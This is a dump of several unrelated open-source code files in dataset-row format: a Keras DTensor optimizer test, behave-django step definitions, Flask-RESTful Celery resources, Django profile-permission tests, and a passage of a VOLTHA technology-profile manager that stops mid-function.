] | null | null | null | keras/dtensor/optimizers_test.py | englert-m/keras | 7007cd0fd548032f1bb2c23b1defa4812628baec | [
"Apache-2.0"
] | null | null | null | keras/dtensor/optimizers_test.py | englert-m/keras | 7007cd0fd548032f1bb2c23b1defa4812628baec | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for initializers."""
from absl.testing import parameterized
from keras.dtensor import optimizers
import numpy as np
import tensorflow.compat.v2 as tf
from keras.dtensor.tests import test_util
from tensorflow.dtensor import python as dtensor # pylint: disable=g-direct-tensorflow-import
class OptimizersTest(test_util.DTensorBaseTest):
  """Tests for the DTensor-aware Keras optimizers in keras.dtensor.optimizers."""

  def setUp(self):
    super(OptimizersTest, self).setUp()
    # Build a 2x2 mesh (axes 'X' and 'Y') over four virtual CPU devices.
    global_ids = test_util.create_device_ids_array((2, 2))
    local_device_ids = np.ravel(global_ids).tolist()
    mesh_dict = {
        'CPU':
            dtensor.Mesh(['X', 'Y'], global_ids,
                         local_device_ids,
                         test_util.create_device_list((2, 2), 'CPU'))
    }
    self.mesh = self.configTestMesh(mesh_dict)

  def test_add_variable_from_reference(self):
    """Slot variables are named after the model variable and share its layout."""
    optimizer = optimizers.Adam(mesh=self.mesh)
    variable_init_value = tf.ones(
        [4, 4], dtype=tf.float32,
        layout=dtensor.Layout.replicated(self.mesh, rank=2))
    model_variable = dtensor.DVariable(variable_init_value,
                                       trainable=True,
                                       name='tmp')
    state_variable = optimizer.add_variable_from_reference(
        model_variable, 'test')
    self.assertEqual(state_variable._shared_name, 'test/tmp')
    # Slot variables start zero-initialized.
    self.assertAllClose(self.evaluate(state_variable), tf.zeros([4, 4]))
    # Make sure the variable contains the correct layout info
    self.assertEqual(state_variable.layout, model_variable.layout)

  def test_build_index_dict(self):
    """_build_index_dict maps each variable's key to its position in the list."""
    optimizer = optimizers.Adam(mesh=self.mesh)
    variable_init_value = tf.ones(
        shape=(), dtype=tf.float32,
        layout=dtensor.Layout.replicated(self.mesh, rank=0))
    var_list = [dtensor.DVariable(variable_init_value, name=f'var{i}')
                for i in range(10)]
    optimizer._build_index_dict(var_list)
    self.assertEqual(optimizer._index_dict[optimizer._var_key(var_list[7])], 7)

  @parameterized.named_parameters(
      ('Adadelta', optimizers.Adadelta, {},
       ['Adadelta/accumulated_grad/Variable',
        'Adadelta/accumulated_delta_var/Variable']),
      ('Adam', optimizers.Adam, {'amsgrad': True},
       ['Adam/m/Variable', 'Adam/v/Variable', 'Adam/vhat/Variable']),
      ('Adagrad', optimizers.Adagrad, {}, ['Adagrad/accumulator/Variable']),
      ('RMSprop', optimizers.RMSprop, {'momentum': 0.1, 'centered': True},
       ['RMSprop/velocity/Variable', 'RMSprop/momentum/Variable',
        'RMSprop/average_gradient/Variable']),
      ('SGD', optimizers.SGD, {'momentum': 0.1}, ['SGD/m/Variable'])
  )
  def test_apply_gradients(self, optimizer_cls, init_args,
                           expect_variable_names):
    """apply_gradients increments `iterations` and creates the expected slots."""
    optimizer = optimizer_cls(mesh=self.mesh, **init_args)
    self.assertEqual(self.evaluate(optimizer.iterations), 0)
    # The iteration counter is replicated across the mesh.
    self.assertEqual(optimizer.iterations.layout,
                     dtensor.Layout.replicated(self.mesh, rank=0))
    variable_init_value = tf.ones(
        [4, 4], dtype=tf.float32,
        layout=dtensor.Layout.replicated(self.mesh, rank=2))
    model_variable = dtensor.DVariable(variable_init_value,
                                       trainable=True)
    grads = tf.ones_like(variable_init_value)
    optimizer.apply_gradients(zip([grads], [model_variable]))
    optimizer_variables = optimizer.variables
    self.assertEqual(self.evaluate(optimizer.iterations), 1)
    all_names = [var._shared_name for var in optimizer_variables]
    # Every optimizer also tracks its iteration counter and learning rate.
    expect_variable_names.extend(['iteration', 'learning_rate'])
    self.assertCountEqual(all_names, expect_variable_names)
# Run the test suite when executed as a script.
if __name__ == '__main__':
  tf.test.main()
| 41.701923 | 94 | 0.675582 |
5251476464b5ad56fb18ed56656c4e158c31ac51 | 2,026 | py | Python | features/steps/context-urlhelper.py | richardARPANET/behave-django | 10d401c3a9619d176e683b439ccac8b97f2f3e34 | [
"MIT"
] | null | null | null | features/steps/context-urlhelper.py | richardARPANET/behave-django | 10d401c3a9619d176e683b439ccac8b97f2f3e34 | [
"MIT"
] | null | null | null | features/steps/context-urlhelper.py | richardARPANET/behave-django | 10d401c3a9619d176e683b439ccac8b97f2f3e34 | [
"MIT"
] | null | null | null | from behave import when, then
from django.core.urlresolvers import reverse
from test_app.models import BehaveTestModel
@when(u'I call get_url() without arguments')
def without_args(context):
context.result = context.get_url()
@when(u'I call get_url("{url_path}") with an absolute path')
def path_arg(context, url_path):
context.result = context.get_url(url_path)
@when(u'I call get_url("{view_name}") with a view name')
def view_arg(context, view_name):
context.result = context.get_url(view_name)
@when(u'I call get_url(model) with a model instance')
def model_arg(context):
context.model = BehaveTestModel(name='Foo', number=3)
context.result = context.get_url(context.model)
@then(u'it returns the value of base_url')
def is_baseurl_value(context):
context.test.assertEquals(context.result, context.base_url)
@then(u'the result is the base_url with "{url_path}" appended')
def baseurl_plus_path(context, url_path):
context.test.assertEquals(context.result, context.base_url + url_path)
@then(u'the result is the base_url with reverse("{view_name}") appended')
def baseurl_plus_reverse(context, view_name):
path = reverse(view_name)
assert len(path) > 0, "Non-empty path expected"
context.test.assertEquals(context.result, context.base_url + path)
@then(u'the result is the base_url with model.get_absolute_url() appended')
def baseurl_plus_absolute_url(context):
path = context.model.get_absolute_url()
assert len(path) > 0, "Non-empty path expected"
context.test.assertEquals(context.result, context.base_url + path)
@then(u'this returns the same result as get_url(reverse("{view_name}"))')
def explicit_reverse(context, view_name):
path = reverse(view_name)
context.test.assertEquals(context.result, context.get_url(path))
@then(u'this returns the same result as get_url(model.get_absolute_url())')
def get_model_url(context):
path = context.model.get_absolute_url()
context.test.assertEquals(context.result, context.get_url(path))
| 32.677419 | 75 | 0.754689 |
f9daacec56dd26de5d9b2e90fbbc88933e922b65 | 549 | py | Python | apigateway/mission/resources.py | automation-liberation/api-gateway | 6c10f6a772ab578740e99a365e6b97e7761c5127 | [
"Apache-2.0"
] | null | null | null | apigateway/mission/resources.py | automation-liberation/api-gateway | 6c10f6a772ab578740e99a365e6b97e7761c5127 | [
"Apache-2.0"
] | null | null | null | apigateway/mission/resources.py | automation-liberation/api-gateway | 6c10f6a772ab578740e99a365e6b97e7761c5127 | [
"Apache-2.0"
] | null | null | null | from flask import request
from flask_restful import Resource
from apigateway.celery import celery
class StartMission(Resource):
def get(self, mission_id):
celery.send_task('missioncontrol.mission.start', (mission_id,))
return {"msg": f"Mission started"}
class CreateMission(Resource):
def post(self):
return celery.send_task('missioncontrol.mission.create', (request.json,)).get()
class Missions(Resource):
def get(self):
return celery.send_task('missioncontrol.mission.get_all_missions').get()
| 22.875 | 87 | 0.721311 |
a539bb1f6ea807c748d672576d0f5b9d31b2d1cf | 3,963 | py | Python | profiles/permissions_test.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 12 | 2017-09-27T21:23:27.000Z | 2020-12-25T04:31:30.000Z | profiles/permissions_test.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 3,293 | 2017-06-30T18:16:01.000Z | 2022-03-31T18:01:34.000Z | profiles/permissions_test.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 1 | 2020-04-13T12:19:57.000Z | 2020-04-13T12:19:57.000Z | # pylint: disable=too-many-arguments,redefined-outer-name
""" Tests for profile permissions """
import pytest
from open_discussions.factories import UserFactory
from profiles.permissions import (
HasEditPermission,
HasSiteEditPermission,
is_owner_or_privileged_user,
)
lazy = pytest.lazy_fixture
@pytest.fixture
def user1():
    """Simple test user fixture (factory `build` strategy: not persisted)."""
    return UserFactory.build()
@pytest.fixture
def user2():
    """Another simple test user fixture (factory `build` strategy: not persisted)."""
    return UserFactory.build()
# Cases: (object user, request user, superuser?, staff?, expected result)
@pytest.mark.parametrize(
    "object_user,request_user,is_super,is_staff,exp_result",
    [
        (lazy("user1"), lazy("user2"), False, False, False),
        (lazy("user1"), lazy("user1"), False, False, True),
        (lazy("user1"), lazy("user2"), True, False, True),
        (lazy("user1"), lazy("user2"), False, True, True),
    ],
)
def test_is_owner_or_privileged_user(
    mocker, object_user, request_user, is_super, is_staff, exp_result
):
    """
    Test that is_owner_or_privileged_user returns True if the object user and request user match, or if the
    request user is a superuser/staff
    """
    request_user.is_superuser = is_super
    request_user.is_staff = is_staff
    request = mocker.Mock(user=request_user)
    assert is_owner_or_privileged_user(object_user, request) is exp_result
def test_can_edit_profile_staff(mocker, staff_user):
    """Staff users are granted both view- and object-level edit permission."""
    profile = staff_user.profile
    request = mocker.Mock(user=staff_user)
    view_allowed = HasEditPermission().has_permission(request, mocker.Mock())
    edit_allowed = HasEditPermission().has_object_permission(
        request, mocker.Mock(), profile
    )
    assert view_allowed is True
    assert edit_allowed is True
@pytest.mark.parametrize(
    "method,result",
    [("GET", True), ("HEAD", True), ("OPTIONS", True), ("POST", False), ("PUT", False)],
)
@pytest.mark.parametrize("is_super", [True, False])
def test_can_edit_other_profile(mocker, method, result, user, is_super):
    """
    Test that non-staff users are not allowed to edit another user's profile
    """
    request = mocker.Mock(user=user, method=method)
    profile = UserFactory.create(is_superuser=is_super).profile
    # NOTE(review): by operator precedence this parses as
    # ((... is result) or is_super), so when is_super is True the assertion
    # passes regardless of the permission result — the superuser-owned
    # profile cases are effectively unchecked. Confirm whether that is
    # intentional before tightening.
    assert (
        HasEditPermission().has_object_permission(request, mocker.Mock(), profile)
        is result
        or is_super
    )
@pytest.mark.parametrize("method", ["GET", "HEAD", "OPTIONS", "POST", "PUT"])
def test_can_edit_own_profile(mocker, method, user):
    """A user always has object-level edit permission on their own profile."""
    own_profile = user.profile
    request = mocker.Mock(user=user, method=method)
    granted = HasEditPermission().has_object_permission(
        request, mocker.Mock(), own_profile
    )
    assert granted is True
@pytest.mark.parametrize("method", ["GET", "HEAD", "OPTIONS"])
def test_site_edit_permission_safe(mocker, method):
    """Safe HTTP methods are always allowed by HasSiteEditPermission."""
    request = mocker.Mock(user=UserFactory.build(), method=method)
    outcome = HasSiteEditPermission().has_object_permission(
        request, view=mocker.Mock(), obj=mocker.Mock()
    )
    assert outcome is True
@pytest.mark.parametrize(
    "permission_check_ret_val,exp_result", [(True, True), (False, False)]
)
@pytest.mark.parametrize("method", ["POST", "PUT"])
def test_site_edit_permission(mocker, method, permission_check_ret_val, exp_result):
    """For unsafe methods HasSiteEditPermission mirrors the ownership helper."""
    request = mocker.Mock(user=mocker.Mock(), method=method)
    patched_permission_func = mocker.patch(
        "profiles.permissions.is_owner_or_privileged_user",
        return_value=permission_check_ret_val,
    )
    outcome = HasSiteEditPermission().has_object_permission(
        request, view=mocker.Mock(), obj=mocker.Mock(profile=request.user)
    )
    assert outcome is exp_result
    # The decision must have been delegated to the helper exactly once.
    patched_permission_func.assert_called_once()
| 31.959677 | 107 | 0.693162 |
162b476d31421d55f69586e39c3337113a1a15cc | 26,236 | py | Python | pyvoltha/common/tech_profile/tech_profile.py | nsharma70/pyvoltha | ea01eb85f45e3cd0bed12b4b446e5af7f66c16db | [
"Apache-2.0"
] | null | null | null | pyvoltha/common/tech_profile/tech_profile.py | nsharma70/pyvoltha | ea01eb85f45e3cd0bed12b4b446e5af7f66c16db | [
"Apache-2.0"
] | 1 | 2021-03-25T23:34:15.000Z | 2021-03-25T23:34:15.000Z | pyvoltha/common/tech_profile/tech_profile.py | rohan-agra/VOL-2311-pyvoltha | 54ac9266cf4fc27a7583ba08ada779ad107e9cfe | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import json
import ast
from collections import namedtuple
import structlog
from enum import Enum
from pyvoltha.common.config.config_backend import ConsulStore
from pyvoltha.common.config.config_backend import EtcdStore
from pyvoltha.common.utils.registry import registry
from voltha_protos import openolt_pb2
from six.moves import range
# logger
log = structlog.get_logger()
DEFAULT_TECH_PROFILE_TABLE_ID = 64
# Enums used while creating TechProfileInstance
Direction = Enum('Direction', ['UPSTREAM', 'DOWNSTREAM', 'BIDIRECTIONAL'],
start=0)
SchedulingPolicy = Enum('SchedulingPolicy',
['WRR', 'StrictPriority', 'Hybrid'], start=0)
AdditionalBW = Enum('AdditionalBW', ['None', 'NA', 'BestEffort', 'Auto'],
start=0)
DiscardPolicy = Enum('DiscardPolicy',
['TailDrop', 'WTailDrop', 'RED', 'WRED'], start=0)
InferredAdditionBWIndication = Enum('InferredAdditionBWIndication',
['None', 'NoneAssured', 'BestEffort'],
start=0)
class InstanceControl(object):
# Default value constants
ONU_DEFAULT_INSTANCE = 'multi-instance'
UNI_DEFAULT_INSTANCE = 'single-instance'
DEFAULT_NUM_GEM_PORTS = 1
DEFAULT_GEM_PAYLOAD_SIZE = 'auto'
def __init__(self, onu=ONU_DEFAULT_INSTANCE,
uni=UNI_DEFAULT_INSTANCE,
num_gem_ports=DEFAULT_NUM_GEM_PORTS,
max_gem_payload_size=DEFAULT_GEM_PAYLOAD_SIZE):
self.onu = onu
self.uni = uni
self.num_gem_ports = num_gem_ports
self.max_gem_payload_size = max_gem_payload_size
class Scheduler(object):
# Default value constants
DEFAULT_ADDITIONAL_BW = 'auto'
DEFAULT_PRIORITY = 0
DEFAULT_WEIGHT = 0
DEFAULT_Q_SCHED_POLICY = 'hybrid'
def __init__(self, direction, additional_bw=DEFAULT_ADDITIONAL_BW,
priority=DEFAULT_PRIORITY,
weight=DEFAULT_WEIGHT,
q_sched_policy=DEFAULT_Q_SCHED_POLICY):
self.direction = direction
self.additional_bw = additional_bw
self.priority = priority
self.weight = weight
self.q_sched_policy = q_sched_policy
class GemPortAttribute(object):
# Default value constants
DEFAULT_AES_ENCRYPTION = 'True'
DEFAULT_PRIORITY_Q = 0
DEFAULT_WEIGHT = 0
DEFAULT_MAX_Q_SIZE = 'auto'
DEFAULT_DISCARD_POLICY = DiscardPolicy.TailDrop.name
def __init__(self, pbit_map, discard_config,
aes_encryption=DEFAULT_AES_ENCRYPTION,
scheduling_policy=SchedulingPolicy.WRR.name,
priority_q=DEFAULT_PRIORITY_Q,
weight=DEFAULT_WEIGHT,
max_q_size=DEFAULT_MAX_Q_SIZE,
discard_policy=DiscardPolicy.TailDrop.name):
self.max_q_size = max_q_size
self.pbit_map = pbit_map
self.aes_encryption = aes_encryption
self.scheduling_policy = scheduling_policy
self.priority_q = priority_q
self.weight = weight
self.discard_policy = discard_policy
self.discard_config = discard_config
class DiscardConfig(object):
    """Queue-discard (RED/WRED-style) threshold settings for a GEM port."""

    # Default value constants
    DEFAULT_MIN_THRESHOLD = 0
    DEFAULT_MAX_THRESHOLD = 0
    DEFAULT_MAX_PROBABILITY = 0

    def __init__(self, min_threshold=DEFAULT_MIN_THRESHOLD,
                 max_threshold=DEFAULT_MAX_THRESHOLD,
                 max_probability=DEFAULT_MAX_PROBABILITY):
        """Record the three thresholds exactly as supplied."""
        for name, value in (('min_threshold', min_threshold),
                            ('max_threshold', max_threshold),
                            ('max_probability', max_probability)):
            setattr(self, name, value)
class TechProfile(object):
    """Technology-profile manager backed by a KV store (etcd or consul).

    Fetches profile definitions from the KV store, builds per-subscriber
    ``TechProfileInstance`` objects (falling back to a built-in default
    profile) and persists/removes those instances under
    ``<technology>/<table_id>/<uni_port_name>`` below
    ``KV_STORE_TECH_PROFILE_PATH_PREFIX``.
    """

    # Constants used in default tech profile
    DEFAULT_TECH_PROFILE_NAME = 'Default_1tcont_1gem_Profile'
    DEFAULT_VERSION = 1.0
    DEFAULT_GEMPORTS_COUNT = 1
    # One p-bit map per default GEM port; all eight p-bits are mapped.
    pbits = ['0b11111111']

    # Tech profile path prefix in kv store
    KV_STORE_TECH_PROFILE_PATH_PREFIX = 'service/voltha/technology_profiles'

    # Tech profile path in kv store
    TECH_PROFILE_PATH = '{}/{}'  # <technology>/<table_id>

    # Tech profile instance path in kv store
    # Format: <technology>/<table_id>/<uni_port_name>
    TECH_PROFILE_INSTANCE_PATH = '{}/{}/{}'

    # Tech-Profile JSON String Keys
    NAME = 'name'
    PROFILE_TYPE = 'profile_type'
    VERSION = 'version'
    NUM_GEM_PORTS = 'num_gem_ports'
    INSTANCE_CONTROL = 'instance_control'
    US_SCHEDULER = 'us_scheduler'
    DS_SCHEDULER = 'ds_scheduler'
    UPSTREAM_GEM_PORT_ATTRIBUTE_LIST = 'upstream_gem_port_attribute_list'
    DOWNSTREAM_GEM_PORT_ATTRIBUTE_LIST = 'downstream_gem_port_attribute_list'
    ONU = 'onu'
    UNI = 'uni'
    MAX_GEM_PAYLOAD_SIZE = 'max_gem_payload_size'
    DIRECTION = 'direction'
    ADDITIONAL_BW = 'additional_bw'
    PRIORITY = 'priority'
    Q_SCHED_POLICY = 'q_sched_policy'
    WEIGHT = 'weight'
    PBIT_MAP = 'pbit_map'
    DISCARD_CONFIG = 'discard_config'
    MAX_THRESHOLD = 'max_threshold'
    MIN_THRESHOLD = 'min_threshold'
    MAX_PROBABILITY = 'max_probability'
    DISCARD_POLICY = 'discard_policy'
    PRIORITY_Q = 'priority_q'
    SCHEDULING_POLICY = 'scheduling_policy'
    MAX_Q_SIZE = 'max_q_size'
    AES_ENCRYPTION = 'aes_encryption'

    def __init__(self, resource_mgr):
        """Connect to the KV backend selected by the registered CLI args.

        :param resource_mgr: resource manager; its ``technology`` attribute
            is used to build KV paths and ``get_resource_id`` allocates
            alloc/gemport ids for instances.
        :raises Exception: on any failure while reading args or connecting.
        """
        try:
            self.args = registry('main').get_args()
            self.resource_mgr = resource_mgr
            if self.args.backend == 'etcd':
                # KV store's IP Address and PORT
                host, port = self.args.etcd.split(':', 1)
                self._kv_store = EtcdStore(
                    host, port, TechProfile.
                    KV_STORE_TECH_PROFILE_PATH_PREFIX)
            elif self.args.backend == 'consul':
                # KV store's IP Address and PORT
                host, port = self.args.consul.split(':', 1)
                self._kv_store = ConsulStore(
                    host, port, TechProfile.
                    KV_STORE_TECH_PROFILE_PATH_PREFIX)
            # NOTE(review): any other backend value leaves self._kv_store
            # unset; later KV accesses would raise AttributeError.
            # self.tech_profile_instance_store = dict()
        except Exception as e:
            log.exception("exception-in-init")
            # NOTE(review): re-wrapping as Exception(e) discards the original
            # traceback; a bare `raise` would preserve it.
            raise Exception(e)

    class DefaultTechProfile(object):
        """Plain-object view of a tech profile; used both for the built-in
        default profile and for profiles decoded from the KV store."""

        def __init__(self, name, **kwargs):
            # Keyword keys must match the Tech-Profile JSON string keys above.
            self.name = name
            self.profile_type = kwargs[TechProfile.PROFILE_TYPE]
            self.version = kwargs[TechProfile.VERSION]
            self.num_gem_ports = kwargs[TechProfile.NUM_GEM_PORTS]
            self.instance_control = kwargs[TechProfile.INSTANCE_CONTROL]
            self.us_scheduler = kwargs[TechProfile.US_SCHEDULER]
            self.ds_scheduler = kwargs[TechProfile.DS_SCHEDULER]
            self.upstream_gem_port_attribute_list = kwargs[
                TechProfile.UPSTREAM_GEM_PORT_ATTRIBUTE_LIST]
            self.downstream_gem_port_attribute_list = kwargs[
                TechProfile.DOWNSTREAM_GEM_PORT_ATTRIBUTE_LIST]

        def to_json(self):
            # Serialise recursively via __dict__ so nested value objects
            # (Scheduler, GemPortAttribute, ...) become plain JSON objects.
            # NOTE(review): relies on a module-level `json` import that is
            # not visible in this excerpt -- confirm it exists in the file.
            return json.dumps(self, default=lambda o: o.__dict__,
                              indent=4)

    def get_tp_path(self, table_id, uni_port_name):
        """Return the KV path of one tech-profile instance."""
        path = TechProfile.TECH_PROFILE_INSTANCE_PATH.format(
            self.resource_mgr.technology, table_id, uni_port_name)
        log.debug("constructed-tp-path", table_id=table_id,
                  technology=self.resource_mgr.technology,
                  uni_port_name=uni_port_name, path=path)
        return path

    def create_tech_profile_instance(self, table_id, uni_port_name, intf_id):
        """Build and persist a TechProfileInstance.

        Uses the profile stored under ``table_id`` when present, otherwise
        the built-in default profile.

        :return: the new TechProfileInstance, or None on any failure.
        """
        tech_profile_instance = None
        try:
            # Get tech profile from kv store
            tech_profile = self._get_tech_profile_from_kv_store(table_id)
            path = self.get_tp_path(table_id, uni_port_name)
            if tech_profile is not None:
                tech_profile = self._get_tech_profile(tech_profile)
                log.debug(
                    "Created-tech-profile-instance-with-values-from-kvstore")
            else:
                tech_profile = self._default_tech_profile()
                log.debug(
                    "Created-tech-profile-instance-with-default-values")
            tech_profile_instance = TechProfileInstance(
                uni_port_name, tech_profile, self.resource_mgr, intf_id)
            self._add_tech_profile_instance(path,
                                            tech_profile_instance.to_json())
        except Exception as e:
            log.exception("Create-tech-profile-instance-failed", exception=e)
        return tech_profile_instance

    def get_tech_profile_instance(self, table_id, uni_port_name):
        """Fetch a stored TechProfileInstance, or None when absent."""
        # path to fetch tech profile instance json from kv store
        path = TechProfile.TECH_PROFILE_INSTANCE_PATH.format(
            self.resource_mgr.technology, table_id, uni_port_name)
        try:
            tech_profile_instance = self._kv_store[path]
            log.debug("Tech-profile-instance-present-in-kvstore", path=path,
                      tech_profile_instance=tech_profile_instance)
            # Parse JSON into an object with attributes corresponding to dict keys.
            # NOTE(review): relies on `namedtuple` (collections) being
            # imported above this excerpt -- confirm in the full file.
            tech_profile_instance = json.loads(tech_profile_instance,
                                               object_hook=lambda d:
                                               namedtuple('tech_profile_instance',
                                                          list(d.keys()))(*list(d.values())))
            log.debug("Tech-profile-instance-after-json-to-object-conversion",
                      path=path,
                      tech_profile_instance=tech_profile_instance)
            return tech_profile_instance
        except BaseException as e:
            # A missing key is the normal "not found" case; log at debug only.
            log.debug("Tech-profile-instance-not-present-in-kvstore",
                      path=path, tech_profile_instance=None, exception=e)
            return None

    def delete_tech_profile_instance(self, tp_path):
        """Delete the instance stored at ``tp_path``; True on success."""
        try:
            del self._kv_store[tp_path]
            log.debug("Delete-tech-profile-instance-success", path=tp_path)
            return True
        except Exception as e:
            log.debug("Delete-tech-profile-instance-failed", path=tp_path,
                      exception=e)
            return False

    def _get_tech_profile_from_kv_store(self, table_id):
        """
        Get tech profile from kv store.
        :param table_id: reference to get tech profile
        :return: parsed tech profile (dict) if present in kv store else None
        """
        # get tech profile from kv store
        path = TechProfile.TECH_PROFILE_PATH.format(self.resource_mgr.technology,
                                                    table_id)
        try:
            tech_profile = self._kv_store[path]
            if tech_profile != '':
                log.debug("Get-tech-profile-success", tech_profile=tech_profile)
                return json.loads(tech_profile)
                # return ast.literal_eval(tech_profile)
        except KeyError as e:
            log.info("Get-tech-profile-failed", exception=e)
            return None

    def _default_tech_profile(self):
        """Build the built-in 1-T-CONT / 1-GEM-port default profile."""
        # Default tech profile
        upstream_gem_port_attribute_list = list()
        downstream_gem_port_attribute_list = list()
        for pbit in TechProfile.pbits:
            upstream_gem_port_attribute_list.append(
                GemPortAttribute(pbit_map=pbit,
                                 discard_config=DiscardConfig()))
            downstream_gem_port_attribute_list.append(
                GemPortAttribute(pbit_map=pbit,
                                 discard_config=DiscardConfig()))
        return TechProfile.DefaultTechProfile(
            TechProfile.DEFAULT_TECH_PROFILE_NAME,
            profile_type=self.resource_mgr.technology,
            version=TechProfile.DEFAULT_VERSION,
            num_gem_ports=TechProfile.DEFAULT_GEMPORTS_COUNT,
            instance_control=InstanceControl(),
            us_scheduler=Scheduler(direction=Direction.UPSTREAM.name),
            ds_scheduler=Scheduler(direction=Direction.DOWNSTREAM.name),
            upstream_gem_port_attribute_list=upstream_gem_port_attribute_list,
            downstream_gem_port_attribute_list=
            downstream_gem_port_attribute_list)

    @staticmethod
    def _get_tech_profile(tech_profile):
        """Convert a profile dict (decoded KV JSON) into DefaultTechProfile,
        rebuilding the nested Scheduler/GemPortAttribute value objects."""
        # Tech profile fetched from kv store
        instance_control = tech_profile[TechProfile.INSTANCE_CONTROL]
        instance_control = InstanceControl(
            onu=instance_control[TechProfile.ONU],
            uni=instance_control[TechProfile.UNI],
            max_gem_payload_size=instance_control[
                TechProfile.MAX_GEM_PAYLOAD_SIZE])
        us_scheduler = tech_profile[TechProfile.US_SCHEDULER]
        us_scheduler = Scheduler(direction=us_scheduler[TechProfile.DIRECTION],
                                 additional_bw=us_scheduler[
                                     TechProfile.ADDITIONAL_BW],
                                 priority=us_scheduler[TechProfile.PRIORITY],
                                 weight=us_scheduler[TechProfile.WEIGHT],
                                 q_sched_policy=us_scheduler[
                                     TechProfile.Q_SCHED_POLICY])
        ds_scheduler = tech_profile[TechProfile.DS_SCHEDULER]
        ds_scheduler = Scheduler(direction=ds_scheduler[TechProfile.DIRECTION],
                                 additional_bw=ds_scheduler[
                                     TechProfile.ADDITIONAL_BW],
                                 priority=ds_scheduler[TechProfile.PRIORITY],
                                 weight=ds_scheduler[TechProfile.WEIGHT],
                                 q_sched_policy=ds_scheduler[
                                     TechProfile.Q_SCHED_POLICY])
        upstream_gem_port_attribute_list = list()
        downstream_gem_port_attribute_list = list()
        us_gemport_attr_list = tech_profile[
            TechProfile.UPSTREAM_GEM_PORT_ATTRIBUTE_LIST]
        for i in range(len(us_gemport_attr_list)):
            upstream_gem_port_attribute_list.append(
                GemPortAttribute(
                    pbit_map=us_gemport_attr_list[i][TechProfile.PBIT_MAP],
                    discard_config=DiscardConfig(
                        max_threshold=us_gemport_attr_list[i][
                            TechProfile.DISCARD_CONFIG][
                            TechProfile.MAX_THRESHOLD],
                        min_threshold=us_gemport_attr_list[i][
                            TechProfile.DISCARD_CONFIG][
                            TechProfile.MIN_THRESHOLD],
                        max_probability=us_gemport_attr_list[i][
                            TechProfile.DISCARD_CONFIG][
                            TechProfile.MAX_PROBABILITY]),
                    discard_policy=us_gemport_attr_list[i][
                        TechProfile.DISCARD_POLICY],
                    priority_q=us_gemport_attr_list[i][
                        TechProfile.PRIORITY_Q],
                    weight=us_gemport_attr_list[i][TechProfile.WEIGHT],
                    scheduling_policy=us_gemport_attr_list[i][
                        TechProfile.SCHEDULING_POLICY],
                    max_q_size=us_gemport_attr_list[i][
                        TechProfile.MAX_Q_SIZE],
                    aes_encryption=us_gemport_attr_list[i][
                        TechProfile.AES_ENCRYPTION]))
        ds_gemport_attr_list = tech_profile[
            TechProfile.DOWNSTREAM_GEM_PORT_ATTRIBUTE_LIST]
        for i in range(len(ds_gemport_attr_list)):
            downstream_gem_port_attribute_list.append(
                GemPortAttribute(
                    pbit_map=ds_gemport_attr_list[i][TechProfile.PBIT_MAP],
                    discard_config=DiscardConfig(
                        max_threshold=ds_gemport_attr_list[i][
                            TechProfile.DISCARD_CONFIG][
                            TechProfile.MAX_THRESHOLD],
                        min_threshold=ds_gemport_attr_list[i][
                            TechProfile.DISCARD_CONFIG][
                            TechProfile.MIN_THRESHOLD],
                        max_probability=ds_gemport_attr_list[i][
                            TechProfile.DISCARD_CONFIG][
                            TechProfile.MAX_PROBABILITY]),
                    discard_policy=ds_gemport_attr_list[i][
                        TechProfile.DISCARD_POLICY],
                    priority_q=ds_gemport_attr_list[i][
                        TechProfile.PRIORITY_Q],
                    weight=ds_gemport_attr_list[i][TechProfile.WEIGHT],
                    scheduling_policy=ds_gemport_attr_list[i][
                        TechProfile.SCHEDULING_POLICY],
                    max_q_size=ds_gemport_attr_list[i][
                        TechProfile.MAX_Q_SIZE],
                    aes_encryption=ds_gemport_attr_list[i][
                        TechProfile.AES_ENCRYPTION]))
        return TechProfile.DefaultTechProfile(
            tech_profile[TechProfile.NAME],
            profile_type=tech_profile[TechProfile.PROFILE_TYPE],
            version=tech_profile[TechProfile.VERSION],
            num_gem_ports=tech_profile[TechProfile.NUM_GEM_PORTS],
            instance_control=instance_control,
            us_scheduler=us_scheduler,
            ds_scheduler=ds_scheduler,
            upstream_gem_port_attribute_list=upstream_gem_port_attribute_list,
            downstream_gem_port_attribute_list=
            downstream_gem_port_attribute_list)

    def _add_tech_profile_instance(self, path, tech_profile_instance):
        """
        Add tech profile instance to kv store.
        :param path: path to add tech profile
        :param tech_profile_instance: tech profile instance need to be added
        :return: True on success, False otherwise
        """
        try:
            self._kv_store[path] = str(tech_profile_instance)
            log.debug("Add-tech-profile-instance-success", path=path,
                      tech_profile_instance=tech_profile_instance)
            return True
        except BaseException as e:
            log.exception("Add-tech-profile-instance-failed", path=path,
                          tech_profile_instance=tech_profile_instance,
                          exception=e)
            return False

    @staticmethod
    def get_us_scheduler(tech_profile_instance):
        """Build the openolt Scheduler protobuf for the upstream direction."""
        # upstream scheduler
        us_scheduler = openolt_pb2.Scheduler(
            direction=TechProfile.get_parameter(
                'direction', tech_profile_instance.us_scheduler.
                direction),
            additional_bw=TechProfile.get_parameter(
                'additional_bw', tech_profile_instance.
                us_scheduler.additional_bw),
            priority=tech_profile_instance.us_scheduler.priority,
            weight=tech_profile_instance.us_scheduler.weight,
            sched_policy=TechProfile.get_parameter(
                'sched_policy', tech_profile_instance.
